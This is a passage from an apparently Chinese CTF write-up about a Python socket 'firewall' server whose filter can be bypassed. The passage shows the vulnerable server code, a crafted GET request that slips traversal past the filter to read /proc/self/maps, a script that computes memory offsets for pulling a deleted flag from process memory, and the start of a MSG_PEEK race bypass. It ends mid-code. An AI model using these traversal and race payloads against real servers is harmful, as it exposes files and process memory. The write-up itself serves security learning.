class="string"> .container { border: 1px solid #00ff00; padding: 2rem; display: inline-block; }</span></span><br><span class="line"><span class="string"> h1 { font-size: 2.5rem; text-shadow: 0 0 5px #00ff00; }</span></span><br><span class="line"><span class="string"> p { font-size: 1.2rem; }</span></span><br><span class="line"><span class="string"> .status { color: #ffff00; }</span></span><br><span class="line"><span class="string"> </style></span></span><br><span class="line"><span class="string"></head></span></span><br><span class="line"><span class="string"><body></span></span><br><span class="line"><span class="string"> <div class="container"></span></span><br><span class="line"><span class="string"> <h1>Firewall</h1></span></span><br><span class="line"><span class="string"> <p class="status">STATUS: All systems operational.</p></span></span><br><span class="line"><span class="string"> <p>Your connection has been inspected.</p></span></span><br><span class="line"><span class="string"> </div></span></span><br><span class="line"><span class="string"></body></span></span><br><span class="line"><span class="string"></html>"""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">handle_connection</span>(<span class="params">conn, addr, log, factor=<span class="number">1</span></span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> conn.settimeout(<span class="number">10.0</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> log:</span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">'log.txt'</span>, <span class="string">'a'</span>) <span class="keyword">as</span> f:</span><br><span class="line"> fcntl.flock(f, fcntl.LOCK_EX)</span><br><span class="line"> log_bytes = <span class="string">f"<span class="subst">{addr[<span class="number">0</span>]}</span>:<span class="subst">{<span class="built_in">str</span>(addr[<span class="number">1</span>])}</span>:<span class="subst">{<span class="built_in">str</span>(conn)}</span>"</span>.encode()</span><br><span class="line"> <span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(factor):</span><br><span class="line"> log_bytes = hashlib.sha3_256(log_bytes).digest()</span><br><span class="line"> log_entry = log_bytes.<span class="built_in">hex</span>() + <span class="string">"\n"</span></span><br><span class="line"> f.write(log_entry)</span><br><span class="line"> </span><br><span class="line"> request_data = conn.recv(<span class="number">256</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> request_data.startswith(<span class="string">b"GET /"</span>):</span><br><span class="line"> response = <span class="string">b"HTTP/1.1 400 Bad Request\r\n\r\nInvalid Request"</span></span><br><span class="line"> conn.sendall(response)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> path = request_data.split(<span class="string">b' '</span>)[<span class="number">1</span>]</span><br><span class="line"> pattern = <span class="string">rb'\?offset=(\d+)&length=(\d+)'</span></span><br><span class="line"> </span><br><span class="line"> offset = <span class="number">0</span></span><br><span class="line"> length = -<span class="number">1</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">match</span> = re.search(pattern, path)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">match</span>:</span><br><span class="line"> offset = <span class="built_in">int</span>(<span class="keyword">match</span>.group(<span class="number">1</span>).decode())</span><br><span class="line"> length = <span class="built_in">int</span>(<span class="keyword">match</span>.group(<span class="number">2</span>).decode())</span><br><span class="line"> </span><br><span class="line"> clean_path = re.sub(pattern, <span class="string">b''</span>, path)</span><br><span class="line"> filename = clean_path.strip(<span class="string">b'/'</span>).decode()</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> filename = path.strip(<span class="string">b'/'</span>).decode()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">except</span> Exception:</span><br><span class="line"> response = <span class="string">b"HTTP/1.1 400 Bad Request\r\n\r\nInvalid Request"</span></span><br><span class="line"> conn.sendall(response)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> filename:</span><br><span class="line"> response_body = PAGE</span><br><span class="line"> response_status = <span class="string">"200 OK"</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(os.path.normpath(filename), <span class="string">'rb'</span>) <span class="keyword">as</span> f:</span><br><span class="line"> <span class="keyword">if</span> offset > <span class="number">0</span>:</span><br><span class="line"> f.seek(offset)</span><br><span class="line"> </span><br><span class="line"> data_bytes = f.read(length)</span><br><span class="line"> response_body = data_bytes.decode(<span class="string">'utf-8'</span>, <span class="string">'ignore'</span>)</span><br><span class="line"> response_status = <span class="string">"200 OK"</span></span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> response_body = <span class="string">f"Invalid path"</span></span><br><span class="line"> response_status = <span class="string">"500 Internal Server Error"</span></span><br><span class="line"></span><br><span class="line"> response = <span class="string">f"HTTP/1.1 <span class="subst">{response_status}</span>\r\nContent-Length: <span class="subst">{<span class="built_in">len</span>(response_body)}</span>\r\n\r\n<span class="subst">{response_body}</span>"</span></span><br><span class="line"> conn.sendall(response.encode())</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">except</span> Exception:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"> <span class="keyword">finally</span>:</span><br><span class="line"> conn.close()</span><br><span class="line"> os._exit(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line"> server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line"> server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, <span class="number">1</span>)</span><br><span class="line"> server.bind((<span class="string">'0.0.0.0'</span>, <span class="number">1337</span>))</span><br><span class="line"> server.listen(<span class="number">50</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">f"Server listening on port 1337..."</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> pid, status = os.waitpid(-<span class="number">1</span>, os.WNOHANG)</span><br><span class="line"> <span class="keyword">except</span> ChildProcessError:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"> conn, addr = server.accept()</span><br><span class="line"></span><br><span class="line"> initial_data = conn.recv(<span class="number">256</span>, socket.MSG_PEEK)</span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">any</span>(term <span class="keyword">in</span> initial_data.lower() <span class="keyword">for</span> term <span class="keyword">in</span> FORBIDDEN):</span><br><span class="line"> conn.sendall(<span class="string">b"HTTP/1.1 403 Forbidden\r\n\r\nSuspicious request pattern detected."</span>)</span><br><span class="line"> conn.close()</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> initial_data.startswith(<span class="string">b'GET /?log=1'</span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> factor = <span class="number">1</span></span><br><span class="line"> pattern = <span class="string">rb"&factor=(\d+)"</span></span><br><span class="line"> <span class="keyword">match</span> = re.search(pattern, initial_data)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">match</span>:</span><br><span class="line"> factor = <span class="built_in">int</span>(<span class="keyword">match</span>.group(<span class="number">1</span>).decode())</span><br><span class="line"> pid = os.fork()</span><br><span class="line"> <span class="keyword">if</span> pid == <span class="number">0</span>:</span><br><span class="line"> server.close()</span><br><span class="line"> handle_connection(conn, addr, <span class="literal">True</span>, factor)</span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"[ERROR]: "</span>, e)</span><br><span class="line"> <span class="keyword">finally</span>:</span><br><span class="line"> conn.close()</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> pid = os.fork()</span><br><span class="line"> <span class="keyword">if</span> pid == <span class="number">0</span>:</span><br><span class="line"> server.close()</span><br><span class="line"> handle_connection(conn, addr, <span class="literal">False</span>)</span><br><span class="line"> </span><br><span class="line"> conn.close()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> main()</span><br></pre></td></tr></table></figure><p>在把flag读到内存之后直接删了,也就是需要去内存proc/self/mem里面找</p><h4 id="非预期"><a href="#非预期" class="headerlink" title="非预期"></a>非预期</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pattern = rb'\?offset=(\d+)&length=(\d+)'</span><br><span class="line"></span><br><span class="line">clean_path = re.sub(pattern, b'', path)</span><br></pre></td></tr></table></figure><p>仅仅将不合法的内容替换成空</p><p>把?offset=(\d+)&length=(\d+)直接插在/../proc/self/environ被过滤的..和proc中间就行了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GET /.?offset=0&length=100000.?offset=0&length=10000/pr?offset=0&length=100000oc/self/maps HTTP/1.1</span><br><span class="line">Host: hostlocal:17309</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260111203148997.png" alt="image-20260111203148997"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br></pre></td><td class="code"><pre><span class="line">56395827e000-56395827f000 r--p 00000000 103:00 15523385 /usr/local/bin/python3.12</span><br><span class="line">56395827f000-563958280000 r-xp 00001000 103:00 15523385 /usr/local/bin/python3.12</span><br><span class="line">563958280000-563958281000 r--p 00002000 103:00 15523385 /usr/local/bin/python3.12</span><br><span class="line">563958281000-563958282000 r--p 00002000 103:00 15523385 /usr/local/bin/python3.12</span><br><span class="line">563958282000-563958283000 rw-p 00003000 103:00 15523385 /usr/local/bin/python3.12</span><br><span class="line">563959f5f000-56395a3b0000 rw-p 00000000 00:00 0 [heap]</span><br><span class="line">7fa2fe996000-7fa2fe998000 r--p 00000000 103:00 15524156 /usr/local/lib/python3.12/lib-dynload/mmap.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe998000-7fa2fe99b000 r-xp 00002000 103:00 15524156 /usr/local/lib/python3.12/lib-dynload/mmap.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe99b000-7fa2fe99d000 r--p 00005000 103:00 15524156 /usr/local/lib/python3.12/lib-dynload/mmap.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe99d000-7fa2fe99e000 r--p 00006000 103:00 15524156 /usr/local/lib/python3.12/lib-dynload/mmap.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe99e000-7fa2fe99f000 rw-p 00007000 103:00 15524156 /usr/local/lib/python3.12/lib-dynload/mmap.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe99f000-7fa2fe9a0000 r--p 00000000 103:00 15524153 /usr/local/lib/python3.12/lib-dynload/fcntl.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9a0000-7fa2fe9a2000 r-xp 00001000 103:00 15524153 /usr/local/lib/python3.12/lib-dynload/fcntl.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9a2000-7fa2fe9a4000 r--p 00003000 103:00 15524153 /usr/local/lib/python3.12/lib-dynload/fcntl.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9a4000-7fa2fe9a5000 r--p 00004000 103:00 15524153 /usr/local/lib/python3.12/lib-dynload/fcntl.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9a5000-7fa2fe9a6000 rw-p 00005000 103:00 15524153 /usr/local/lib/python3.12/lib-dynload/fcntl.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9a6000-7fa2fe9a8000 r--p 00000000 103:00 15524094 /usr/local/lib/python3.12/lib-dynload/_blake2.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9a8000-7fa2fe9af000 r-xp 00002000 103:00 15524094 /usr/local/lib/python3.12/lib-dynload/_blake2.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9af000-7fa2fe9b1000 r--p 00009000 103:00 15524094 /usr/local/lib/python3.12/lib-dynload/_blake2.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9b1000-7fa2fe9b2000 r--p 0000a000 103:00 15524094 /usr/local/lib/python3.12/lib-dynload/_blake2.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9b2000-7fa2fe9b3000 rw-p 0000b000 103:00 15524094 /usr/local/lib/python3.12/lib-dynload/_blake2.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2fe9b3000-7fa2fe9b8000 r--p 00000000 103:00 15520405 /usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7</span><br><span class="line">7fa2fe9b8000-7fa2fea67000 r-xp 00005000 103:00 15520405 /usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7</span><br><span class="line">7fa2fea67000-7fa2fea7b000 r--p 000b4000 103:00 15520405 /usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7</span><br><span class="line">7fa2fea7b000-7fa2fea7c000 r--p 000c8000 103:00 15520405 /usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7</span><br><span class="line">7fa2fea7c000-7fa2fea7d000 rw-p 000c9000 103:00 15520405 /usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7</span><br><span class="line">7fa2fea7d000-7fa2fea80000 r--p 00000000 103:00 15520403 /usr/lib/x86_64-linux-gnu/libz.so.1.3.1</span><br><span class="line">7fa2fea80000-7fa2fea94000 r-xp 00003000 103:00 15520403 /usr/lib/x86_64-linux-gnu/libz.so.1.3.1</span><br><span class="line">7fa2fea94000-7fa2fea9b000 r--p 00017000 103:00 15520403 /usr/lib/x86_64-linux-gnu/libz.so.1.3.1</span><br><span class="line">7fa2fea9b000-7fa2fea9c000 r--p 0001d000 103:00 15520403 /usr/lib/x86_64-linux-gnu/libz.so.1.3.1</span><br><span class="line">7fa2fea9c000-7fa2fea9d000 rw-p 0001e000 103:00 15520403 /usr/lib/x86_64-linux-gnu/libz.so.1.3.1</span><br><span class="line">7fa2fea9d000-7fa2feb94000 r--p 00000000 103:00 15520163 /usr/lib/x86_64-linux-gnu/libcrypto.so.3</span><br><span class="line">7fa2feb94000-7fa2fef15000 r-xp 000f7000 103:00 15520163 /usr/lib/x86_64-linux-gnu/libcrypto.so.3</span><br><span class="line">7fa2fef15000-7fa2ff04c000 r--p 00478000 103:00 15520163 /usr/lib/x86_64-linux-gnu/libcrypto.so.3</span><br><span class="line">7fa2ff04c000-7fa2ff0cf000 r--p 005ae000 103:00 15520163 /usr/lib/x86_64-linux-gnu/libcrypto.so.3</span><br><span class="line">7fa2ff0cf000-7fa2ff0d2000 rw-p 00631000 103:00 15520163 /usr/lib/x86_64-linux-gnu/libcrypto.so.3</span><br><span class="line">7fa2ff0d2000-7fa2ff0d5000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ff0d5000-7fa2ff0d9000 r--p 00000000 103:00 15524114 /usr/local/lib/python3.12/lib-dynload/_hashlib.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0d9000-7fa2ff0df000 r-xp 00004000 103:00 15524114 /usr/local/lib/python3.12/lib-dynload/_hashlib.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0df000-7fa2ff0e3000 r--p 0000a000 103:00 15524114 /usr/local/lib/python3.12/lib-dynload/_hashlib.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0e3000-7fa2ff0e4000 r--p 0000d000 103:00 15524114 /usr/local/lib/python3.12/lib-dynload/_hashlib.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0e4000-7fa2ff0e6000 rw-p 0000e000 103:00 15524114 /usr/local/lib/python3.12/lib-dynload/_hashlib.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0e6000-7fa2ff0ea000 r--p 00000000 103:00 15524149 /usr/local/lib/python3.12/lib-dynload/array.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0ea000-7fa2ff0f1000 r-xp 00004000 103:00 15524149 /usr/local/lib/python3.12/lib-dynload/array.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0f1000-7fa2ff0f5000 r--p 0000b000 103:00 15524149 /usr/local/lib/python3.12/lib-dynload/array.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0f5000-7fa2ff0f6000 r--p 0000f000 103:00 15524149 /usr/local/lib/python3.12/lib-dynload/array.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0f6000-7fa2ff0f7000 rw-p 00010000 103:00 15524149 /usr/local/lib/python3.12/lib-dynload/array.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff0f7000-7fa2ff1f7000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ff1f7000-7fa2ff1f9000 r--p 00000000 103:00 15524161 /usr/local/lib/python3.12/lib-dynload/select.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff1f9000-7fa2ff1fc000 r-xp 00002000 103:00 15524161 /usr/local/lib/python3.12/lib-dynload/select.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff1fc000-7fa2ff1fe000 r--p 00005000 103:00 15524161 /usr/local/lib/python3.12/lib-dynload/select.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff1fe000-7fa2ff1ff000 r--p 00006000 103:00 15524161 /usr/local/lib/python3.12/lib-dynload/select.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff1ff000-7fa2ff200000 rw-p 00007000 103:00 15524161 /usr/local/lib/python3.12/lib-dynload/select.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff200000-7fa2ff300000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ff300000-7fa2ff304000 r--p 00000000 103:00 15524131 /usr/local/lib/python3.12/lib-dynload/_socket.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff304000-7fa2ff30f000 r-xp 00004000 103:00 15524131 /usr/local/lib/python3.12/lib-dynload/_socket.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff30f000-7fa2ff318000 r--p 0000f000 103:00 15524131 /usr/local/lib/python3.12/lib-dynload/_socket.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff318000-7fa2ff319000 r--p 00017000 103:00 15524131 /usr/local/lib/python3.12/lib-dynload/_socket.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff319000-7fa2ff31a000 rw-p 00018000 103:00 15524131 /usr/local/lib/python3.12/lib-dynload/_socket.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ff31a000-7fa2ff51a000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ff51a000-7fa2ff52b000 r--p 00000000 103:00 15520236 /usr/lib/x86_64-linux-gnu/libm.so.6</span><br><span class="line">7fa2ff52b000-7fa2ff5a8000 r-xp 00011000 103:00 15520236 /usr/lib/x86_64-linux-gnu/libm.so.6</span><br><span class="line">7fa2ff5a8000-7fa2ff608000 r--p 0008e000 103:00 15520236 /usr/lib/x86_64-linux-gnu/libm.so.6</span><br><span class="line">7fa2ff608000-7fa2ff609000 r--p 000ed000 103:00 15520236 /usr/lib/x86_64-linux-gnu/libm.so.6</span><br><span class="line">7fa2ff609000-7fa2ff60a000 rw-p 000ee000 103:00 15520236 /usr/lib/x86_64-linux-gnu/libm.so.6</span><br><span class="line">7fa2ff60a000-7fa2ff632000 r--p 00000000 103:00 15520148 /usr/lib/x86_64-linux-gnu/libc.so.6</span><br><span class="line">7fa2ff632000-7fa2ff797000 r-xp 00028000 103:00 15520148 /usr/lib/x86_64-linux-gnu/libc.so.6</span><br><span class="line">7fa2ff797000-7fa2ff7ed000 r--p 0018d000 103:00 15520148 /usr/lib/x86_64-linux-gnu/libc.so.6</span><br><span class="line">7fa2ff7ed000-7fa2ff7f1000 r--p 001e2000 103:00 15520148 /usr/lib/x86_64-linux-gnu/libc.so.6</span><br><span class="line">7fa2ff7f1000-7fa2ff7f3000 rw-p 001e6000 103:00 15520148 /usr/lib/x86_64-linux-gnu/libc.so.6</span><br><span class="line">7fa2ff7f3000-7fa2ff800000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ff800000-7fa2ff900000 r--p 00000000 103:00 15523607 /usr/local/lib/libpython3.12.so.1.0</span><br><span class="line">7fa2ff900000-7fa2ffb1f000 r-xp 00100000 103:00 15523607 /usr/local/lib/libpython3.12.so.1.0</span><br><span class="line">7fa2ffb1f000-7fa2ffc6f000 r--p 0031f000 103:00 15523607 /usr/local/lib/libpython3.12.so.1.0</span><br><span class="line">7fa2ffc6f000-7fa2ffce6000 r--p 0046e000 103:00 15523607 /usr/local/lib/libpython3.12.so.1.0</span><br><span class="line">7fa2ffce6000-7fa2ffe55000 rw-p 004e5000 103:00 15523607 /usr/local/lib/libpython3.12.so.1.0</span><br><span class="line">7fa2ffe55000-7fa2ffe56000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ffe5c000-7fa2ffe5f000 r--p 00000000 103:00 15524155 /usr/local/lib/python3.12/lib-dynload/math.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ffe5f000-7fa2ffe67000 r-xp 00003000 103:00 15524155 /usr/local/lib/python3.12/lib-dynload/math.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ffe67000-7fa2ffe6c000 r--p 0000b000 103:00 15524155 /usr/local/lib/python3.12/lib-dynload/math.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ffe6c000-7fa2ffe6d000 r--p 0000f000 103:00 15524155 /usr/local/lib/python3.12/lib-dynload/math.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ffe6d000-7fa2ffe6e000 rw-p 00010000 103:00 15524155 /usr/local/lib/python3.12/lib-dynload/math.cpython-312-x86_64-linux-gnu.so</span><br><span class="line">7fa2ffe6e000-7fa2ffed4000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2ffed4000-7fa2ffedb000 r--s 00000000 103:00 15520059 /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache</span><br><span class="line">7fa2ffedb000-7fa2fff35000 r--p 00000000 103:00 15519696 /usr/lib/locale/C.utf8/LC_CTYPE</span><br><span class="line">7fa2fff35000-7fa2fff37000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2fff38000-7fa2fff39000 rw-s 00000000 00:01 6174 /dev/zero (deleted)</span><br><span class="line">7fa2fff39000-7fa2fff3b000 rw-p 00000000 00:00 0 </span><br><span class="line">7fa2fff3b000-7fa2fff3c000 r--p 00000000 103:00 15520122 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2</span><br><span class="line">7fa2fff3c000-7fa2fff64000 r-xp 00001000 103:00 15520122 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2</span><br><span class="line">7fa2fff64000-7fa2fff6f000 r--p 00029000 103:00 15520122 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2</span><br><span class="line">7fa2fff6f000-7fa2fff71000 r--p 00034000 103:00 15520122 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2</span><br><span class="line">7fa2fff71000-7fa2fff72000 rw-p 00036000 103:00 15520122 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2</span><br><span class="line">7fa2fff72000-7fa2fff73000 rw-p 00000000 00:00 0 </span><br><span class="line">7ffe68e9d000-7ffe68ebe000 rw-p 00000000 00:00 0 [stack]</span><br><span class="line">7ffe68ec9000-7ffe68ecd000 r--p 00000000 00:00 0 [vvar]</span><br><span class="line">7ffe68ecd000-7ffe68ecf000 r-xp 00000000 00:00 0 [vdso]</span><br><span class="line">ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]</span><br></pre></td></tr></table></figure><p>我们不知道 Flag 存放在内存的哪个绝对地址。 就需要找权限为可读写 rw-p且没有关联文件名的内存段</p><p>用脚本算偏移和长度,从十六进制到十进制</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">maps=<span class="built_in">open</span>(<span class="string">'maps'</span>)</span><br><span class="line">b = maps.read()</span><br><span class="line"><span class="built_in">list</span> = b.split(<span class="string">'\n'</span>)</span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> <span class="built_in">list</span>:</span><br><span class="line"> <span class="keyword">if</span> <span class="string">'rw'</span> <span class="keyword">in</span> line:</span><br><span class="line"> addr = re.search(<span class="string">'([0-9a-f]+)-([0-9a-f]+)'</span>,line)</span><br><span class="line"> <span class="comment">#正则匹配地址,地址格式为十六进制数[0-9a-f],reserch会返回一个re.Match对象,用括号括起来是为了使用group()处理返回结果。</span></span><br><span class="line"> start = <span class="built_in">int</span>(addr.group(<span class="number">1</span>),<span class="number">16</span>) <span class="comment">#将十六进制字符转化为十进制数,为了符合start参数格式参考链接</span></span><br><span class="line"> end = <span class="built_in">int</span>(addr.group(<span class="number">2</span>),<span class="number">16</span>) <span class="comment">#将十六进制字符转化为十进制数,为了符合end参数格式</span></span><br><span class="line"> <span class="built_in">print</span>(start,end)</span><br><span class="line"> <span class="built_in">print</span>(end-start)</span><br></pre></td></tr></table></figure><p>因为不清楚在哪一段里面于是每个都算出来手动试了</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260111203517430.png" alt="image-20260111203517430"></p><p>最后也是可以看到是在 /usr/local/lib/python3.12/lib-dynload/select.cpython-312-x86_64-linux-gnu.so 这一段里面</p><h4 id="预期"><a href="#预期" class="headerlink" title="预期"></a>预期</h4><p>代码里进行了两次 recv,与 waf 相关的是这一段</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">initial_data = conn.recv(<span class="number">256</span>, socket.MSG_PEEK)</span><br><span class="line"><span class="keyword">if</span> <span class="built_in">any</span>(term <span class="keyword">in</span> initial_data.lower() <span class="keyword">for</span> term <span class="keyword">in</span> FORBIDDEN):</span><br><span class="line"> conn.sendall(<span class="string">b"HTTP/1.1 403 Forbidden\r\n\r\nSuspicious request pattern detected."</span>)</span><br><span class="line"> conn.close()</span><br><span class="line"> <span class="keyword">continue</span></span><br></pre></td></tr></table></figure><p>里面用了MSG_PEEK,只是查看数据,而不取走数据</p><p>也就是说数据会留在缓冲区,而正式读入是在 handle_connection,一旦读取则会把数据移除缓冲区</p><p>在读入前,如果进了log,会优先进行 log 再读入,而如果这里 factor 的值给高了会计算一会哈希值,卡在这里一段时间,那么缓冲区中就会持续存在 GET /?log=1&factor=100000,此时如果在通过 MSG_PEEK 后缓冲区还未清除之前立刻插入再传入,因为进程已经过了waf环节,于是新传入的 /../../../proc/self/maps就会跳过waf检测直接接在后面 ,那么实际进入缓冲区内为 GET /?log=1&factor=100000/../../../proc/self/maps </p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 